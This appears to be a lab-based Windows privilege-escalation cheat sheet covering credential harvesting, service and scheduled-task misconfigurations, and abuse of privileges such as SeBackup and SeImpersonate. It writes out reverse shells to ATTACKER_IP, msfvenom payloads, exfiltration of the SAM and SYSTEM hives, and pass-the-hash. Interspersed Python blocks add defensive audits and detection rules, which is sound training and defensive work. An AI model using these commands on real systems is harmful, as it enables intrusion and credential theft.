🪟Windows Privilege Escalation
Harvesting Passwords from Usual Spots
Unattended Windows Installations
Unattended installations use an admin account to do the initial setup; its credentials might end up stored on the machine in these locations:
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
As part of these files you might find credentials:
<Credentials>
<Username>Administrator</Username>
<Domain>thm.local</Domain>
<Password>MyPassword123</Password>
</Credentials>
PowerShell History
If a user runs a command that includes a password, it can be retrieved from the PowerShell history file using the following command:
# This will only work from cmd.exe
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Saved Windows Credentials
Windows allows the use of other users' credentials. The command below lists saved credentials:
cmdkey /list
# If you notice any credentials worth trying, use them with this command
runas /savecred /user:admin cmd.exe
IIS Configuration
IIS config is stored in a file called web.config and can store passwords for databases or authentication mechanisms. The file can be found here:
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
Quick way to find database strings on the file:
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
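A small audit helper for the two file types above (unattend/sysprep answer files and IIS web.config), written for this page as an added example and not part of the original notes; the two XML samples are constructed to mirror the snippets shown here. It reports where a populated password lives so the file can be cleaned up, and handles the AutoLogon `<Password><Value>` form as well as the plain `<Password>text</Password>` form.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

# Constructed samples shaped like the files listed above (not from a real
# host): a sysprep/unattend answer file and an IIS web.config.
UNATTEND_XML = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="specialize"><component name="Microsoft-Windows-UnattendedJoin">
    <Identification><Credentials>
      <Username>Administrator</Username><Domain>thm.local</Domain>
      <Password>MyPassword123</Password>
    </Credentials></Identification>
  </component></settings>
</unattend>"""
WEB_CONFIG = """<configuration><connectionStrings>
  <add name="AppDb" connectionString="Server=db01;User Id=svc_app;Password=S3cret!;" />
  <add name="Cache" connectionString="Server=cache01;Integrated Security=True;" />
</connectionStrings></configuration>"""

def local_name(tag: str) -> str:
    """Strip an XML namespace: '{urn:...}Password' -> 'Password'."""
    return tag.rsplit("}", 1)[-1]

def find_unattend_secrets(xml_text: str) -> List[str]:
    """Element paths of populated *Password* elements. Handles the plain
    <Password>text</Password> form shown above and the AutoLogon form
    <Password><Value>...</Value></Password>."""
    hits: List[str] = []

    def walk(elem, path):
        here = f"{path}/{local_name(elem.tag)}"
        if local_name(elem.tag).endswith("Password"):
            value = elem.find("{*}Value")  # any-namespace wildcard, Python 3.8+
            text = (value.text if value is not None else elem.text) or ""
            if text.strip():
                hits.append(here)
        for child in elem:
            walk(child, here)

    walk(ET.fromstring(xml_text), "")
    return hits

PASSWORD_KV = re.compile(r"\b(?:password|pwd)\s*=\s*[^;\"']+", re.IGNORECASE)

def find_connection_string_secrets(xml_text: str) -> List[str]:
    """Names of <add> connection strings whose value embeds a password."""
    root = ET.fromstring(xml_text)
    return [add.get("name", "?") for add in root.iter("add")
            if PASSWORD_KV.search(add.get("connectionString", ""))]
```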
Retrieve Credentials from PuTTY
PuTTY doesn't allow users to store their SSH password, but it will store proxy configurations that include cleartext authentication credentials.
Command to retrieve stored proxy credentials:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Scheduled Tasks
Look for scheduled tasks that have either lost their binary or use a binary you can modify.
# Retrieve detailed information
schtasks /query /tn vulnask /fo list /v
# We care about the "Task to Run" and "Run As User" parameters
# Check file permissions of the Task to Run file
icacls C:\tasks\schtask.bat
# If nc64.exe available we can use that to spawn a reverse shell
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
# Start listener on attacker machine
nc -lvp 4444
AlwaysInstallElevated
Windows installer files usually run with the privilege level of the user that starts them.
They can be configured to run with higher privileges from any user account; this could allow us to generate a malicious MSI file that would run with admin privileges.
This method requires two registry values to be set. You can query these from the command line using the commands below:
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
# You can generate a malicious .msi file using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_x.x.x.x LPORT=LOCAL_PORT -f msi -o malicious.msi
# You should also run the Metasploit Handler module.
# Once you have transferred the file you created, run the installer with this command and get the reverse shell
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
Abusing Service Misconfigurations
Windows Services
Service Control Manager (SCM) is a process in charge of managing the state of services as needed.
# Get the configuration of a service
sc qc SERVICE_NAME
# Service configurations are stored on the registry under
HKLM\SYSTEM\CurrentControlSet\Services\
Insecure Permissions on Service Executable
If the executable associated with a service has weak permissions that allow us to modify or replace it, we can gain the privileges of the service's account.
# Query the service configuration
sc qc WindowsScheduler
# check permissions
icacls BINARY_PATH_NAME
# Generate an exe-service payload using msfvenom and serve it through a python webserver
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
python3 -m http.server
# Pull the payload from victim machine using powershell
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe
# Replace the service executable with our payload
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
Unquoted Service Paths
Particular behavior happens when a service is configured to point to an "unquoted" executable. This means the path of the associated executable isn't properly quoted to account for spaces in the command, for example C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe.
When the SCM tries to execute the associated binary, a problem arises. Since there are spaces in the name of the "Disk Sorter Enterprise" folder, the command becomes ambiguous, and the SCM doesn't know which of the candidates listed below you are trying to execute.
This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the "right" interpretation of the unquoted command would be to execute C:\MyPrograms\Disk.exe and take the rest as arguments. Instead of failing as it probably should, the SCM tries to help the user and searches for each of the binaries in the following order:
- C:\MyPrograms\Disk.exe: searched first. If it exists, the service will run this executable.
- C:\MyPrograms\Disk Sorter.exe: searched if the previous one doesn't exist. If it exists, the service will run this executable.
- C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe: searched last. This option is expected to succeed and will typically be run in a default installation.
# Create payload using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe
# Move payload and grant permissions
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
# restart service
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"
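The search order above, generalized into an audit helper that lists, for every service with an unquoted path containing spaces, the files the SCM would run instead of the real binary if they existed, so a defender can confirm those directories are not writable by standard users. This is an added example written for this page, not the room's own tooling; the service list is constructed from the names used in these notes.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of (service name, BINARY_PATH_NAME) pairs as `sc qc`
# would report them (not captured from a real host).
SAMPLE_SERVICES: List[Tuple[str, str]] = [
    ("disksorter", r"C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe"),
    ("WindowsScheduler", r'"C:\PROGRA~2\SystemScheduler\WService.exe"'),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("VendorAgent", r"C:\Program Files\Vendor Tool\agent.exe -k netsvcs"),
]
# Default program folders, whose ACLs do not let standard users create files.
DEFAULT_PROGRAM_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")

def scm_search_order(binary_path_name: str) -> List[str]:
    """Executables the SCM tries, in order, for a service's BINARY_PATH_NAME.

    A quoted path has one unambiguous candidate. For an unquoted path, each
    prefix that ends at a space is tried first (with .exe appended), and the
    full path last, which is the search order described above for
    "Disk Sorter Enterprise".
    """
    cmd = binary_path_name.strip()
    if cmd.startswith('"'):
        return [cmd[1:cmd.index('"', 1)]]
    match = re.match(r"(.*?\.exe)", cmd, re.IGNORECASE)  # image path without args
    image = match.group(1) if match else cmd
    candidates = [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]
    candidates.append(image)
    return candidates

def audit_unquoted_paths(services) -> Dict[str, Dict[str, object]]:
    """Report every ambiguous service: the files the SCM would run instead of
    the real one if they existed (so their directories must not be writable
    by standard users), and whether the path lies outside the default program
    folders, which the notes above single out as the exploitable case."""
    findings: Dict[str, Dict[str, object]] = {}
    for name, path in services:
        order = scm_search_order(path)
        if len(order) < 2:
            continue  # quoted, or no spaces: nothing to check
        findings[name] = {
            "paths_tried_first": order[:-1],
            "outside_program_files":
                not order[-1].lower().startswith(DEFAULT_PROGRAM_DIRS),
        }
    return findings
```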
- If binaries are installed in non-default paths that are world-writable (anything other than C:\Program Files or C:\Program Files (x86)), the vulnerability can be exploited.
- For example, if it is installed in C:\MyPrograms, which inherits the permissions of the C:\ directory, any user can create files and folders in it.
- The process of creating a payload with msfvenom is the same as before.
Insecure Service Permissions
If the service DACL (not the service executable's DACL) lets you modify the configuration of a service, then you can reconfigure the service.
This lets you point it to any executable and run it with the account you prefer.
# You can check for a service DACL from the CLI using Accesschk
# Accesschk is included in the Sysinternals suite
accesschk64.exe -qlc thmservice
# If the Users group has SERVICE_ALL_ACCESS permission, that means you can reconfigure the service
# Create msfvenom payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe
# start listener in attacker
nc -lvp 4447
# transfer payload using python and wget
# Grant permissions to Everyone to execute the payload
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
# Change the service's associated executable and account
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
# We choose to use LocalSystem account because it is the highest privileged account
# Trigger payload
sc stop THMService
sc start THMService
Abusing Dangerous Privileges
Windows Privileges
A complete list of available privileges on Windows systems is available here.
You can find a comprehensive list of exploitable privileges on the Priv2Admin Github project.
# Check user privileges
whoami /priv
SeBackup / SeRestore
Allows users to read and write to any file in the system, ignoring any DACL in place.
Allows certain users to perform backups from a system without needing full admin privileges.
Technique: copy the SAM and SYSTEM registry hives to extract the local Admin's password hash.
# Check privileges
whoami /priv
# Backup SAM and SYSTEM hashes
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
# Copy files to the attacker machine using SMB or another available method
# For SMB, we can use smbserver.py to start a simple SMB server with a network share in a directory on the attacker machine
mkdir share
# This creates a share named public pointing to the share directory and requires the username and password of the current windows session
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
# Use the copy command in target machine to transfer files to your attack box
copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public
# Use impacket to get password hashes
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
# Use Admin hash to perform a pass-the-Hash attack and gain access to target machine with SYSTEM privileges
python3.9 /opt/impacket/examples/psexec.py -hashes ADMIN_HASH administrator@TARGET_IP
# Check you get SYSTEM privileges
whoami
SeTakeOwnership
Allows users to take ownership of any object on the system, including files and registry keys
Opens up possibilities for an attacker to elevate privileges. For example, search for a service running as SYSTEM and take over the service's executable
# Check privileges
whoami /priv
# Abuse utilman.exe - a built-in windows app used to provide Ease of Access during the lock screen
# Utilman runs with SYSTEM privileges, so we can gain SYSTEM privileges if we replace the original binary with any payload we like.
# Replace utilman, by taking ownership of it
takeown /f C:\Windows\System32\Utilman.exe
# Being owner of a file doesn't mean you have privileges over it
# Give your user full permissions over utilman.exe using this command:
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
# Replace utilman.exe with a copy of cmd.exe
copy cmd.exe utilman.exe
# Trigger utilman by locking screen from the start button
# Click on the Ease of Access button, running utilman.exe with SYSTEM privileges.
# Since we replaced it with cmd.exe we will get a command prompt with SYSTEM privileges
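Detection logic for the command lines used in the SeBackup/SeRestore, SeTakeOwnership, insecure service DACL and AlwaysInstallElevated sections above, written as an added example for this page (not part of the original notes). The rules run over constructed 4688-style process-creation records reduced to user and command line; the rule names and the event format are assumptions for the example.

```python
import re
from typing import Any, List, Tuple

# Detection rules as (name, pattern over the process command line). The
# patterns are modelled on the commands shown in the sections above; baseline
# them against legitimate admin activity before turning them into alerts.
RULES: List[Tuple[str, Any]] = [
    ("hive_dump_sebackup",  # reg save of SAM/SYSTEM/SECURITY (SeBackup)
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    ("accessibility_binary_takeover",  # takeown/icacls on Utilman and friends
     re.compile(r"\b(?:takeown|icacls)(?:\.exe)?\s.*\\system32\\"
                r"(?:utilman|sethc|osk|magnify|narrator)\.exe", re.I)),
    ("service_binpath_reconfig",  # sc config ... binPath= (insecure service DACL)
     re.compile(r"\bsc(?:\.exe)?\s+config\s+\S+\s.*binpath=", re.I)),
    ("quiet_msi_from_user_dir",  # silent msiexec from Temp/Users (AlwaysInstallElevated)
     re.compile(r"\bmsiexec(?:\.exe)?\s.*(?:/quiet|/qn)\s.*\\(?:temp|users)\\", re.I)),
]

# Constructed process-creation records (4688-style, simplified to the two
# fields the rules need); not real telemetry.
SAMPLE_EVENTS = [
    r"4688 User=THMBackup CommandLine=reg save hklm\sam C:\Users\THMBackup\sam.hive",
    r"4688 User=THMBackup CommandLine=reg  save  HKLM\SYSTEM C:\Users\THMBackup\system.hive",
    r'4688 User=thm-unpriv CommandLine=sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem',
    r"4688 User=THMTakeOwnership CommandLine=takeown /f C:\Windows\System32\Utilman.exe",
    r"4688 User=thm-unpriv CommandLine=msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi",
    r"4688 User=thm-unpriv CommandLine=icacls C:\tasks\schtask.bat",  # no rule fires
    r"4688 User=SYSTEM CommandLine=reg query HKLM\Software\Policies\Microsoft\Windows\Installer",
]

EVENT_RE = re.compile(r"User=(\S+)\s+CommandLine=(.*)$")

def detect_privesc_commands(events: List[str]) -> List[Tuple[str, str, str]]:
    """Return (rule, user, command_line) for each event matching a rule.
    Only the first matching rule per event is reported."""
    hits: List[Tuple[str, str, str]] = []
    for line in events:
        parsed = EVENT_RE.search(line)
        if not parsed:
            continue  # not a process-creation record we understand
        user, cmdline = parsed.groups()
        for rule_name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((rule_name, user, cmdline))
                break
    return hits
```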
SeImpersonate / SeAssignPrimaryToken
Allows a process to impersonate other users and act on their behalf.
Usually consists of being able to spawn a process or thread under the security context of another user.
As attackers, if we can take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process.
The LOCAL SERVICE and NETWORK SERVICE accounts already have such privileges.
Things we need to elevate privileges:
- Spawn a process so that users can connect and authenticate to it for impersonation to occur
- Find a way to force privileged users to connect and authenticate to the spawned malicious process
# Use RogueWinRM exploit to accomplish both conditions
# Assume we already compromised a website running on IIS and we planted a web shell
# Use the web shell to check for assigned privileges of the compromised account and confirm we have both privileges of interest
# The RogueWinRM exploit is possible because whenever a user (even an unprivileged one) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges
# Port 5985 is simply a port that exposes a PowerShell console
# Think of it as SSH but using PowerShell
# If WinRM isn't running on the victim server, an attacker can
# start a fake WinRM service on port 5985 and catch the
# authentication attempt made by the BITS service
# If the attacker has SeImpersonate privileges, they
# can execute any command on behalf of the connecting user,
# which is SYSTEM
# Trigger RogueWinRM using the web shell
C:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"
Abusing vulnerable software
Unpatched Software
Use the wmic tool to list software installed on the target system and its versions:
# Command will dump information it can gather on installed software
wmic product get name,version,vendor
Search online for existing exploits for the installed software and versions found.
Tools of the Trade
Script developed to enumerate the target system to uncover privilege escalation paths.
PrivescCheck: PowerShell script that searches for common privilege escalation vectors on the target system.
To run PrivescCheck on the target system, you might need to bypass the execution policy restrictions using:
Set-ExecutionPolicy Bypass -Scope process -Force
wes.py (Windows Exploit Suggester - Next Generation): avoids making unnecessary noise that can attract attention because it runs on your attacking machine.
Before using it, run the following command to update its database:
wes.py --update
To use the script, run the systeminfo command on the target system and direct its output to a .txt file, which you will need to move to your attacking machine:
systeminfo
# Run wes.py against the saved output
wes.py systeminfo.txt